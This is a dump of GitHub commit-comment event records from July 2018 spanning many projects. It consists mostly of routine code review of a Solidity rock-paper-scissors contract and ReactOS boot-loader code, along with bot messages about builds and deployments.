{"id":"7952619922","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/bcolz-feedstock"},"payload":{"comment":{"id":29677035,"position":null,"line":null,"path":null,"commit_id":"ef80ccaa027099a46632891329a835693cca5805","created_at":"2018-07-11T21:13:26Z","updated_at":"2018-07-11T21:13:26Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @carstvaartjes were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @carstvaartjes were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-11T21:13:26Z"}
{"id":"7952621574","type":"CommitCommentEvent","actor":{"login":"ryangueraa"},"repo":{"name":"cssnano/cssnano"},"payload":{"comment":{"id":29677044,"position":7,"line":105,"path":"packages/cssnano/src/__tests__/postcss-merge-longhand.js","commit_id":"2b6f26443fcb28f7e355f46637a75414ff419703","created_at":"2018-07-11T21:13:45Z","updated_at":"2018-07-11T21:13:45Z","author_association":"NONE","body":"processCss,\r\n    'h1{margin:10px 20px 30px 40px}',\r\n    'h1{margin:10px 20px 30px 40px}',"}},"created_at":"2018-07-11T21:13:45Z"}
{"id":"7952621861","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29677047,"position":null,"line":null,"path":null,"commit_id":"df9ddbf4d9859b7c4307cd4b02595a3c77d0f4a6","created_at":"2018-07-11T21:13:48Z","updated_at":"2018-07-11T21:13:48Z","author_association":"NONE","body":"179D_Reporting-v8.8.0 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-df9ddbf4d9859b7c4307cd4b02595a3c77d0f4a6-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-11T21:13:48Z"}
{"id":"7952623445","type":"CommitCommentEvent","actor":{"login":"ryangueraa"},"repo":{"name":"cssnano/cssnano"},"payload":{"comment":{"id":29677051,"position":7,"line":105,"path":"packages/cssnano/src/__tests__/postcss-merge-longhand.js","commit_id":"2b6f26443fcb28f7e355f46637a75414ff419703","created_at":"2018-07-11T21:14:08Z","updated_at":"2018-07-11T21:14:08Z","author_association":"NONE","body":"change"}},"created_at":"2018-07-11T21:14:08Z"}
{"id":"7952630422","type":"CommitCommentEvent","actor":{"login":"ryangueraa"},"repo":{"name":"cssnano/cssnano"},"payload":{"comment":{"id":29677066,"position":4,"line":102,"path":"packages/cssnano/src/__tests__/postcss-merge-longhand.js","commit_id":"2b6f26443fcb28f7e355f46637a75414ff419703","created_at":"2018-07-11T21:15:33Z","updated_at":"2018-07-11T21:15:33Z","author_association":"NONE","body":"+test\r\n  (processCss,\r\n    'h1{margin:10px 20px 30px 40px}',\r\n    'h1{margin:10px 20px 30px 40px}',"}},"created_at":"2018-07-11T21:15:33Z"}
{"id":"7952631160","type":"CommitCommentEvent","actor":{"login":"hakiour"},"repo":{"name":"hakiour/screeps"},"payload":{"comment":{"id":29677068,"position":null,"line":null,"path":null,"commit_id":"3d7be5ba34f9535727ec113be8ad755b06f7e672","created_at":"2018-07-11T21:15:42Z","updated_at":"2018-07-11T21:15:42Z","author_association":"OWNER","body":"This wasn't the source of the error"}},"created_at":"2018-07-11T21:15:42Z"}
{"id":"7952632786","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29677069,"position":16,"line":50,"path":"contracts/RockPaperScissors.sol","commit_id":"e3f31208a6332e53a82c47328eae8db989f945c5","created_at":"2018-07-11T21:16:02Z","updated_at":"2018-07-11T21:16:02Z","author_association":"NONE","body":"Interesting choice. Underlying these names, we have `Rock == 0`, `Paper == 1`, and `NoMove == 3`. \r\nI would have chosen `NoMove == 0` since this is what is by default on storage."}},"created_at":"2018-07-11T21:16:02Z"}
{"id":"7952634572","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29677078,"position":17,"line":51,"path":"contracts/RockPaperScissors.sol","commit_id":"e3f31208a6332e53a82c47328eae8db989f945c5","created_at":"2018-07-11T21:16:25Z","updated_at":"2018-07-11T21:16:25Z","author_association":"NONE","body":"Here you could add `NoResult`, perhaps, I have not read it all."}},"created_at":"2018-07-11T21:16:25Z"}
{"id":"7952637112","type":"CommitCommentEvent","actor":{"login":"PatrickvL"},"repo":{"name":"Cxbx-Reloaded/Cxbx-Reloaded"},"payload":{"comment":{"id":29677083,"position":4,"line":null,"path":"src/CxbxKrnl/EmuD3D8.cpp","commit_id":"61373826df1f4a9f6e6f638496942e0406bf4eb0","created_at":"2018-07-11T21:16:58Z","updated_at":"2018-07-11T21:16:58Z","author_association":"MEMBER","body":"This shouldn't have been committed"}},"created_at":"2018-07-11T21:16:58Z"}
{"id":"7952637952","type":"CommitCommentEvent","actor":{"login":"BenParizek"},"repo":{"name":"barrelstrength/craft-sprout-base"},"payload":{"comment":{"id":29677085,"position":null,"line":null,"path":null,"commit_id":"d77ac8a0fcf9c310c30a2315648185bcc777e8b5","created_at":"2018-07-11T21:17:10Z","updated_at":"2018-07-11T21:17:10Z","author_association":"MEMBER","body":"@andrelopez Let's remove `fromEmail` from the `email` validation too."}},"created_at":"2018-07-11T21:17:10Z"}
{"id":"7952638490","type":"CommitCommentEvent","actor":{"login":"sch2307"},"repo":{"name":"sch2307/school_jailbreak"},"payload":{"comment":{"id":29677086,"position":null,"line":null,"path":null,"commit_id":"eb3373984389b3cdfef9467288cbe9122ec4dc9f","created_at":"2018-07-11T21:17:16Z","updated_at":"2018-07-11T21:17:16Z","author_association":"OWNER","body":"Sorry, the changes include the TCS34725 RGB module driver."}},"created_at":"2018-07-11T21:17:16Z"}
{"id":"7952638916","type":"CommitCommentEvent","actor":{"login":"HBelusca"},"repo":{"name":"Extravert-ir/reactos"},"payload":{"comment":{"id":29677088,"position":5,"line":9,"path":"boot/freeldr/bootsect/CMakeLists.txt","commit_id":"7913d79df7a3bb0eeb8c663f1199f59833f27c4c","created_at":"2018-07-11T21:17:21Z","updated_at":"2018-07-11T21:17:21Z","author_association":"NONE","body":"You changed the target name because it already existed (for the driver for example)?"}},"created_at":"2018-07-11T21:17:21Z"}
{"id":"7952639524","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29677090,"position":null,"line":null,"path":null,"commit_id":"ea01bd1a3400186cdeb0ba889997862a80b2e08f","created_at":"2018-07-11T21:17:30Z","updated_at":"2018-07-11T21:17:30Z","author_association":"NONE","body":"157485520-FisherPedersenConvectEqRefTempBug (mjwitte) - i386-Windows-7-VisualStudio-14: OK (2932 of 2933 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 622\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea01bd1a3400186cdeb0ba889997862a80b2e08f-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea01bd1a3400186cdeb0ba889997862a80b2e08f-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-11T21:17:30Z"}
{"id":"7952640978","type":"CommitCommentEvent","actor":{"login":"HBelusca"},"repo":{"name":"Extravert-ir/reactos"},"payload":{"comment":{"id":29677091,"position":5,"line":4,"path":"boot/freeldr/freeldr/lib/fs/fs.c","commit_id":"7913d79df7a3bb0eeb8c663f1199f59833f27c4c","created_at":"2018-07-11T21:17:49Z","updated_at":"2018-07-11T21:17:49Z","author_association":"NONE","body":"Encoding problem ;)"}},"created_at":"2018-07-11T21:17:49Z"}
{"id":"7952642973","type":"CommitCommentEvent","actor":{"login":"marcoabreu"},"repo":{"name":"apache/incubator-mxnet"},"payload":{"comment":{"id":29677098,"position":4,"line":2394,"path":"tests/python/unittest/test_operator.py","commit_id":"9573913e800ff12013699301a31e328d21bc792e","created_at":"2018-07-11T21:18:16Z","updated_at":"2018-07-11T21:18:16Z","author_association":"CONTRIBUTOR","body":"Please add the absolute link because we use regex expressions that use the entire link. Sorry for the inconvenience :/"}},"created_at":"2018-07-11T21:18:16Z"}
{"id":"7952643191","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29677099,"position":77,"line":102,"path":"contracts/RockPaperScissors.sol","commit_id":"e3f31208a6332e53a82c47328eae8db989f945c5","created_at":"2018-07-11T21:18:18Z","updated_at":"2018-07-11T21:18:18Z","author_association":"NONE","body":"I suppose no need to save `committedMoveHash` in the `struct` if it is the key. After all \"you need to it to access it\"."}},"created_at":"2018-07-11T21:18:18Z"}
{"id":"7952644615","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29677101,"position":null,"line":null,"path":null,"commit_id":"457ed4cf06f3bd2a3f0f8a1c082fed8e30330723","created_at":"2018-07-11T21:18:35Z","updated_at":"2018-07-11T21:18:35Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-42](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-42).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-42-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-11T21:18:35Z"}
{"id":"7952645788","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29677108,"position":78,"line":103,"path":"contracts/RockPaperScissors.sol","commit_id":"e3f31208a6332e53a82c47328eae8db989f945c5","created_at":"2018-07-11T21:18:50Z","updated_at":"2018-07-11T21:18:50Z","author_association":"NONE","body":"I see 2 spaces before `amount` 😈 "}},"created_at":"2018-07-11T21:18:50Z"}
{"id":"7952646380","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29677109,"position":null,"line":null,"path":null,"commit_id":"2b36bdf1dfbf5c258d0a172c6af0484551157cef","created_at":"2018-07-11T21:18:58Z","updated_at":"2018-07-11T21:18:58Z","author_association":"COLLABORATOR","body":"<h3>fix small regressions (#2681)</h3>\n\nPreview: <strong><a href='https://18479-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://18479-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://18479-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-11T21:18:58Z"}
{"id":"7952646389","type":"CommitCommentEvent","actor":{"login":"HBelusca"},"repo":{"name":"Extravert-ir/reactos"},"payload":{"comment":{"id":29677110,"position":19,"line":19,"path":"boot/freeldr/freeldr/include/fs/btrfs.h","commit_id":"7913d79df7a3bb0eeb8c663f1199f59833f27c4c","created_at":"2018-07-11T21:18:58Z","updated_at":"2018-07-11T21:18:58Z","author_association":"NONE","body":"Depending on the amount of syslinux code that will survive (untouched or slightly adapted), you may want to add a syslinux copyright notice."}},"created_at":"2018-07-11T21:18:58Z"}
{"id":"7952649603","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29677116,"position":79,"line":104,"path":"contracts/RockPaperScissors.sol","commit_id":"e3f31208a6332e53a82c47328eae8db989f945c5","created_at":"2018-07-11T21:19:41Z","updated_at":"2018-07-11T21:19:41Z","author_association":"NONE","body":"Mmh, why not make the function `payable` and `balances[msg.sender].plus(msg.value).sub(amount);`?"}},"created_at":"2018-07-11T21:19:41Z"}
{"id":"7952651027","type":"CommitCommentEvent","actor":{"login":"bsudekum"},"repo":{"name":"mapbox/mapbox-navigation-ios"},"payload":{"comment":{"id":29677126,"position":null,"line":null,"path":null,"commit_id":"0e25212ddbac944738c5a155357ad1949a243bed","created_at":"2018-07-11T21:20:02Z","updated_at":"2018-07-11T21:20:02Z","author_association":"COLLABORATOR","body":"Noting, this does not work with pods. Only actual tagged releases can be added as dependencies."}},"created_at":"2018-07-11T21:20:02Z"}
{"id":"7952652376","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29677131,"position":96,"line":115,"path":"contracts/RockPaperScissors.sol","commit_id":"e3f31208a6332e53a82c47328eae8db989f945c5","created_at":"2018-07-11T21:20:20Z","updated_at":"2018-07-11T21:20:20Z","author_association":"NONE","body":"Here too, if you make the function `payable`."}},"created_at":"2018-07-11T21:20:20Z"}
{"id":"7952654513","type":"CommitCommentEvent","actor":{"login":"quintesse"},"repo":{"name":"fabric8-launcher/demo-cloud-app-creator"},"payload":{"comment":{"id":29677134,"position":11,"line":14,"path":"src/pages/Create.js","commit_id":"2814def1692f32fbfc4220c4f0c25b96c045a9d5","created_at":"2018-07-11T21:20:45Z","updated_at":"2018-07-11T21:20:45Z","author_association":"CONTRIBUTOR","body":"Dunno. There's something to say for both ways. But being a throw-away demo I don't care enough :)"}},"created_at":"2018-07-11T21:20:45Z"}
{"id":"7952655763","type":"CommitCommentEvent","actor":{"login":"mhei"},"repo":{"name":"openwrt/packages"},"payload":{"comment":{"id":29677135,"position":null,"line":null,"path":null,"commit_id":"f6e06384f1c5aca396ec65a70ec94837f1c133a8","created_at":"2018-07-11T21:21:01Z","updated_at":"2018-07-11T21:21:01Z","author_association":"MEMBER","body":"Could you also post the output of `php-cli -m`? I guess the load order of the extension modules might not be correct, so you could play with the names of the XY-<extension>.ini files..."}},"created_at":"2018-07-11T21:21:01Z"}
{"id":"7952658166","type":"CommitCommentEvent","actor":{"login":"HBelusca"},"repo":{"name":"Extravert-ir/reactos"},"payload":{"comment":{"id":29677143,"position":568,"line":568,"path":"boot/freeldr/freeldr/lib/fs/btrfs.c","commit_id":"7913d79df7a3bb0eeb8c663f1199f59833f27c4c","created_at":"2018-07-11T21:21:33Z","updated_at":"2018-07-11T21:21:33Z","author_association":"NONE","body":"Ext2? :smile: "}},"created_at":"2018-07-11T21:21:33Z"}
{"id":"7952658721","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29677144,"position":86,"line":110,"path":"contracts/RockPaperScissors.sol","commit_id":"e3f31208a6332e53a82c47328eae8db989f945c5","created_at":"2018-07-11T21:21:41Z","updated_at":"2018-07-11T21:21:41Z","author_association":"NONE","body":"`OnlyWhenNotfinished` is redundant here. Your SafeMath is already taking care of it."}},"created_at":"2018-07-11T21:21:41Z"}
{"id":"7952662700","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29677149,"position":84,"line":108,"path":"contracts/RockPaperScissors.sol","commit_id":"e3f31208a6332e53a82c47328eae8db989f945c5","created_at":"2018-07-11T21:22:35Z","updated_at":"2018-07-11T21:22:35Z","author_association":"NONE","body":"Can someone other than `player2` accept?"}},"created_at":"2018-07-11T21:22:35Z"}
{"id":"7952663759","type":"CommitCommentEvent","actor":{"login":"HBelusca"},"repo":{"name":"Extravert-ir/reactos"},"payload":{"comment":{"id":29677150,"position":1,"line":1,"path":"boot/freeldr/freeldr/lib/fs/btrfs.c","commit_id":"7913d79df7a3bb0eeb8c663f1199f59833f27c4c","created_at":"2018-07-11T21:22:48Z","updated_at":"2018-07-11T21:22:48Z","author_association":"NONE","body":"(For later!)\r\nDepending on the amount of syslinux code that will survive (untouched or slightly adapted), you may want to add a syslinux copyright notice."}},"created_at":"2018-07-11T21:22:48Z"}
{"id":"7952663853","type":"CommitCommentEvent","actor":{"login":"anirudh2290"},"repo":{"name":"apache/incubator-mxnet"},"payload":{"comment":{"id":29677151,"position":4,"line":2394,"path":"tests/python/unittest/test_operator.py","commit_id":"9573913e800ff12013699301a31e328d21bc792e","created_at":"2018-07-11T21:22:50Z","updated_at":"2018-07-11T21:22:50Z","author_association":"MEMBER","body":"no worries. fixed it now. "}},"created_at":"2018-07-11T21:22:50Z"}
{"id":"7952690474","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29677203,"position":168,"line":162,"path":"contracts/RockPaperScissors.sol","commit_id":"e3f31208a6332e53a82c47328eae8db989f945c5","created_at":"2018-07-11T21:28:54Z","updated_at":"2018-07-11T21:28:54Z","author_association":"NONE","body":"is `require(games[committedMoveHash].player2 != 0x0)` enough?"}},"created_at":"2018-07-11T21:28:54Z"}
{"id":"7952699119","type":"CommitCommentEvent","actor":{"login":"drewnoakes"},"repo":{"name":"gitextensions/gitextensions"},"payload":{"comment":{"id":29677221,"position":null,"line":null,"path":null,"commit_id":"ed45c4b33cfc8dda522a90c911fb656681fe335e","created_at":"2018-07-11T21:30:46Z","updated_at":"2018-07-11T21:30:46Z","author_association":"COLLABORATOR","body":"Agree that thread abort is a bad idea. Clean signalling is a better approach. Might be better to set the signal as well, as otherwise that `while` loop may wait 500ms.\r\n\r\nHaven't tested this locally but I don't see a problem in principle. It may conflict with #5087 (thanks @gerhardol) but I can fix that if need be."}},"created_at":"2018-07-11T21:30:46Z"}
{"id":"7952699982","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29677222,"position":195,"line":183,"path":"contracts/RockPaperScissors.sol","commit_id":"e3f31208a6332e53a82c47328eae8db989f945c5","created_at":"2018-07-11T21:30:57Z","updated_at":"2018-07-11T21:30:57Z","author_association":"NONE","body":"To be a good citizen, you should put this check before any expensive action like saving the move to storage."}},"created_at":"2018-07-11T21:30:57Z"}
{"id":"7952703015","type":"CommitCommentEvent","actor":{"login":"ryantheengineer"},"repo":{"name":"ryantheengineer/RockWell-Projects"},"payload":{"comment":{"id":29677226,"position":null,"line":null,"path":null,"commit_id":"9cf6c150958571b52d2352c630af95905e6e16d4","created_at":"2018-07-11T21:31:36Z","updated_at":"2018-07-11T21:31:36Z","author_association":"OWNER","body":"Changes to handforce.py were done to update the calculations to account for only one hand force and one spring force. This way variable loads at either end of the bar can be examined."}},"created_at":"2018-07-11T21:31:36Z"}
{"id":"7952703397","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29677227,"position":181,"line":171,"path":"contracts/RockPaperScissors.sol","commit_id":"e3f31208a6332e53a82c47328eae8db989f945c5","created_at":"2018-07-11T21:31:41Z","updated_at":"2018-07-11T21:31:41Z","author_association":"NONE","body":"So if someone finds a hash collision, this person has a shot at cheating."}},"created_at":"2018-07-11T21:31:41Z"}
{"id":"7952704044","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29677229,"position":null,"line":null,"path":null,"commit_id":"ab8f96d5fba0db5c8175688f1d95f3af661f0024","created_at":"2018-07-11T21:31:50Z","updated_at":"2018-07-11T21:31:50Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-776](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-776).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-776-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-11T21:31:50Z"}
{"id":"7952706082","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29677232,"position":183,"line":173,"path":"contracts/RockPaperScissors.sol","commit_id":"e3f31208a6332e53a82c47328eae8db989f945c5","created_at":"2018-07-11T21:32:17Z","updated_at":"2018-07-11T21:32:17Z","author_association":"NONE","body":"`if` with no `else`."}},"created_at":"2018-07-11T21:32:17Z"}
{"id":"7952706943","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29677234,"position":183,"line":173,"path":"contracts/RockPaperScissors.sol","commit_id":"e3f31208a6332e53a82c47328eae8db989f945c5","created_at":"2018-07-11T21:32:29Z","updated_at":"2018-07-11T21:32:29Z","author_association":"NONE","body":"Sounds like a `require` is in order..."}},"created_at":"2018-07-11T21:32:29Z"}
{"id":"7952709387","type":"CommitCommentEvent","actor":{"login":"veneela"},"repo":{"name":"veneela/Assignment1"},"payload":{"comment":{"id":29677245,"position":null,"line":null,"path":null,"commit_id":"c50eab33c48a1a4d4a7faf0161918c8e4ce7f6fd","created_at":"2018-07-11T21:33:02Z","updated_at":"2018-07-11T21:33:02Z","author_association":"OWNER","body":"setter and constructor injection"}},"created_at":"2018-07-11T21:33:02Z"}
{"id":"7952710687","type":"CommitCommentEvent","actor":{"login":"ryantheengineer"},"repo":{"name":"ryantheengineer/RockWell-Projects"},"payload":{"comment":{"id":29677251,"position":5,"line":40,"path":"handforce.py","commit_id":"9cf6c150958571b52d2352c630af95905e6e16d4","created_at":"2018-07-11T21:33:18Z","updated_at":"2018-07-11T21:33:18Z","author_association":"OWNER","body":"From measurements before, the expected low-end load would be somewhere around 25 pounds. Although now that I'm typing this, it might be more like a uniform load with a linear load on top of it (trapezoidal shape). That would better explain the small differences measured today."}},"created_at":"2018-07-11T21:33:18Z"}
{"id":"7952712893","type":"CommitCommentEvent","actor":{"login":"Exodusnick"},"repo":{"name":"Exodusnick97/android_device_samsung_hero-common"},"payload":{"comment":{"id":29677258,"position":null,"line":null,"path":null,"commit_id":"0f44e49b655b5770d945f07989aa04dc0128f6b5","created_at":"2018-07-11T21:33:47Z","updated_at":"2018-07-11T21:33:47Z","author_association":"NONE","body":"Show \"Doze\" instead of \"Hero Doze\""}},"created_at":"2018-07-11T21:33:47Z"}
{"id":"7952715270","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29677266,"position":161,"line":154,"path":"contracts/RockPaperScissors.sol","commit_id":"b7f9c82eca13a65fef0cb74e69a642fce448fb28","created_at":"2018-07-11T21:34:16Z","updated_at":"2018-07-11T21:34:16Z","author_association":"NONE","body":"I could not read. Too deep `if`, looks like a muddle. So easy to have a bug here."}},"created_at":"2018-07-11T21:34:16Z"}
{"id":"7952719887","type":"CommitCommentEvent","actor":{"login":"GoTo95"},"repo":{"name":"GoTo95/Titanic"},"payload":{"comment":{"id":29677273,"position":null,"line":null,"path":null,"commit_id":"3347b1f1d0e1d7a97cdff8bbdaff08d2531b5ed2","created_at":"2018-07-11T21:35:14Z","updated_at":"2018-07-11T21:35:14Z","author_association":"OWNER","body":"Результат .80861"}},"created_at":"2018-07-11T21:35:14Z"}
{"id":"7952722049","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29677276,"position":218,"line":181,"path":"contracts/RockPaperScissors.sol","commit_id":"f6d452abe1551e7d041cac5332dfd155d3c28e68","created_at":"2018-07-11T21:35:46Z","updated_at":"2018-07-11T21:35:46Z","author_association":"NONE","body":"Redundant because SafeMath is doing that for you."}},"created_at":"2018-07-11T21:35:46Z"}
{"id":"7952725083","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29677285,"position":203,"line":222,"path":"contracts/RockPaperScissors.sol","commit_id":"b7f9c82eca13a65fef0cb74e69a642fce448fb28","created_at":"2018-07-11T21:36:26Z","updated_at":"2018-07-11T21:36:26Z","author_association":"NONE","body":"I would not use `msg.sender` but add a parameter to the function for maximum versatility."}},"created_at":"2018-07-11T21:36:26Z"}
{"id":"7952725830","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29677287,"position":null,"line":null,"path":null,"commit_id":"38c9ed6203fdce3f3dcec616f00516eb4f3d0425","created_at":"2018-07-11T21:36:36Z","updated_at":"2018-07-11T21:36:36Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [jfussionfi](https://jfussionfi-static-docs.pantheonsite.io/docs) Multidev environment:\n- [source/_partials/content/d7-composer-init.html](https://github.com/pantheon-systems/documentation/commit/208de57160d7a8df84ed918b2b7f017a17617ac0/source/_partials/content/d7-composer-init.html)\n"}},"created_at":"2018-07-11T21:36:36Z"}
{"id":"7952728085","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29677291,"position":21,"line":55,"path":"contracts/RockPaperScissors.sol","commit_id":"e3f31208a6332e53a82c47328eae8db989f945c5","created_at":"2018-07-11T21:37:07Z","updated_at":"2018-07-11T21:37:07Z","author_association":"NONE","body":"AFAIK, this is `0`."}},"created_at":"2018-07-11T21:37:07Z"}
{"id":"7952729563","type":"CommitCommentEvent","actor":{"login":"var-const"},"repo":{"name":"firebase/firebase-ios-sdk"},"payload":{"comment":{"id":29677292,"position":1,"line":2,"path":"Firestore/Example/FuzzTests/FuzzingResources/Serializer/serializer.dictionary","commit_id":"5ca06270672f2fb4c00e094c279492391f8096d6","created_at":"2018-07-11T21:37:27Z","updated_at":"2018-07-11T21:37:27Z","author_association":"COLLABORATOR","body":"This line also has two quotes, is this intentional?"}},"created_at":"2018-07-11T21:37:27Z"}
{"id":"7952730068","type":"CommitCommentEvent","actor":{"login":"var-const"},"repo":{"name":"firebase/firebase-ios-sdk"},"payload":{"comment":{"id":29677293,"position":18,"line":21,"path":"Firestore/Example/FuzzTests/FuzzingResources/Serializer/Corpus/ConvertTextToBinary.sh","commit_id":"5ca06270672f2fb4c00e094c279492391f8096d6","created_at":"2018-07-11T21:37:33Z","updated_at":"2018-07-11T21:37:33Z","author_association":"COLLABORATOR","body":"Nit: s/excecutes/executes"}},"created_at":"2018-07-11T21:37:33Z"}
{"id":"7952731205","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29677295,"position":null,"line":null,"path":null,"commit_id":"4cb2929dc857159261afd6f7e3e6721ea9c986a5","created_at":"2018-07-11T21:37:51Z","updated_at":"2018-07-11T21:37:51Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-send](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-send).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-send-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-11T21:37:51Z"}
{"id":"7952732119","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29677297,"position":212,"line":175,"path":"contracts/RockPaperScissors.sol","commit_id":"f6d452abe1551e7d041cac5332dfd155d3c28e68","created_at":"2018-07-11T21:38:04Z","updated_at":"2018-07-11T21:38:04Z","author_association":"NONE","body":"Not bad, but it will run out of gas if the fallback is called via a `.transfer`."}},"created_at":"2018-07-11T21:38:04Z"}
{"id":"7952732836","type":"CommitCommentEvent","actor":{"login":"WilsonBradley"},"repo":{"name":"nutechsoftware/alarmdecoder-webapp"},"payload":{"comment":{"id":29677300,"position":null,"line":null,"path":null,"commit_id":"46dd485ff6036a7ea198051ac55c9738bddecf37","created_at":"2018-07-11T21:38:14Z","updated_at":"2018-07-11T21:38:14Z","author_association":"NONE","body":"Thanks.. Can you link instructions to updating everything using SSH terminal.\r\n\r\nThanks."}},"created_at":"2018-07-11T21:38:14Z"}
{"id":"7952734820","type":"CommitCommentEvent","actor":{"login":"var-const"},"repo":{"name":"firebase/firebase-ios-sdk"},"payload":{"comment":{"id":29677307,"position":18,"line":21,"path":"Firestore/Example/FuzzTests/FuzzingResources/Serializer/Corpus/ConvertTextToBinary.sh","commit_id":"5ca06270672f2fb4c00e094c279492391f8096d6","created_at":"2018-07-11T21:38:41Z","updated_at":"2018-07-11T21:38:41Z","author_association":"COLLABORATOR","body":"Sorry I wasn't really clear with my comment. What I'm trying to understand is whether `SCRIPT_OUTPUT_FILE_0` is some built-in XCode thing or something we define. It seems to me that it's the former, but I think it will be great to clarify in the comment."}},"created_at":"2018-07-11T21:38:41Z"}
